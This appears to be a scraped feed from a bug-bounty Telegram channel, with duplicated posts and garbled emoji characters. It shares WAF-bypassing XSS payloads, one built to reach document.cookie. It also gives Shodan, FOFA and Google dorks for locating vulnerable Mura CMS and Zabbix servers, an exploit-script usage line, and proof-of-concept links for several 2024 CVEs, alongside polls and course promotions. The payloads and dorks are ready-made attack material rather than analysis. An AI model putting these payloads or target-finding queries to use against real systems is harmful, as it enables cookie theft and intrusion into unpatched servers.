demo.gif
10.9 MB
π¨SQLMC - SQL Injection Massive Checkerπ¨
π’SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
πDownload https://github.com/malvads/sqlmc
π’SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
πDownload https://github.com/malvads/sqlmc
π8
Brut Security pinned Β«Keep checking my old Posts to continue your learning Process!Β»
Bypass XSS Filter with Array
Payload :
Payload :
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">π6
A ____ is used to connect to a remote system using NetBIOS.
Final Results
46%
NULL session
13%
Hash
10%
Rainbow table
41%
Rootkit
π1
Brut Security
A ____ is used to connect to a remote system using NetBIOS.
Answer is NULL Session
π5π2
π¨Muraider - Automating the detection & Exploitation of CVE-2024-32640 SQLi in Mura/Masa CMSπ¨
β Usage- python3 CVE-2024-32640.py --url https://target.com
πDorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
πLink- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
πReferences:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY
π’For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
πJoin Our Telegram- https://buff.ly/3yi0H1o
πJoin Our Community- https://zurl.co/6G4I
β Usage- python3 CVE-2024-32640.py --url https://target.com
πDorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
πLink- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
πReferences:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY
π’For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
πJoin Our Telegram- https://buff.ly/3yi0H1o
πJoin Our Community- https://zurl.co/6G4I
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
π3π₯2
π’ Take the 30-Day Bug Hunting Challenge!
π¨ Get ready to put your skills to the test! The challenge will be starting from June 1st.
π Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.
π Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity
π For Enquiries DM us in WhatsApp: https://wa.me/918945971332
π¨ Get ready to put your skills to the test! The challenge will be starting from June 1st.
π Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.
π Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity
π For Enquiries DM us in WhatsApp: https://wa.me/918945971332
π2
π¨CVE-2024-22120: Zabbix SQLi Vulnerabilityπ¨
β POC: https://lnkd.in/gtbSbpvg
β POC: https://lnkd.in/gv5t27Vw
πThis time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing attackers to escalate privileges and even achieve remote code execution (RCE).
π’Reference: https://lnkd.in/g3iSTYEy
πDorks:
Hunter:/product.name="Zabbix"
FOFA:app="ZABBIX-Monitoring"
SHODAN:http.component:"Zabbix"
β POC: https://lnkd.in/gtbSbpvg
β POC: https://lnkd.in/gv5t27Vw
πThis time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing attackers to escalate privileges and even achieve remote code execution (RCE).
π’Reference: https://lnkd.in/g3iSTYEy
πDorks:
Hunter:/product.name="Zabbix"
FOFA:app="ZABBIX-Monitoring"
SHODAN:http.component:"Zabbix"
π3π₯2
π¨CVE-2024-4367 & CVE-2024-34342: Arbitrary JavaScript execution in PDF.js
πA type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.
If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.
π’POC: https://www.youtube.com/watch?v=c90_UKJvj_w
π’POC: https://github.com/LOURC0D3/CVE-2024-4367-PoC
πA type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.
If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.
π’POC: https://www.youtube.com/watch?v=c90_UKJvj_w
π’POC: https://github.com/LOURC0D3/CVE-2024-4367-PoC
π₯3π2
What are the Cybersecurity Risks of Mobile Banking Apps?
Anonymous Poll
19%
Malware
36%
App Vulnerabilities
29%
Phishing Attacks
16%
Man-in-the-Middle Attacks
This XSS Payload bypasses Imperva's Protection.
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=alert(origin)>
π9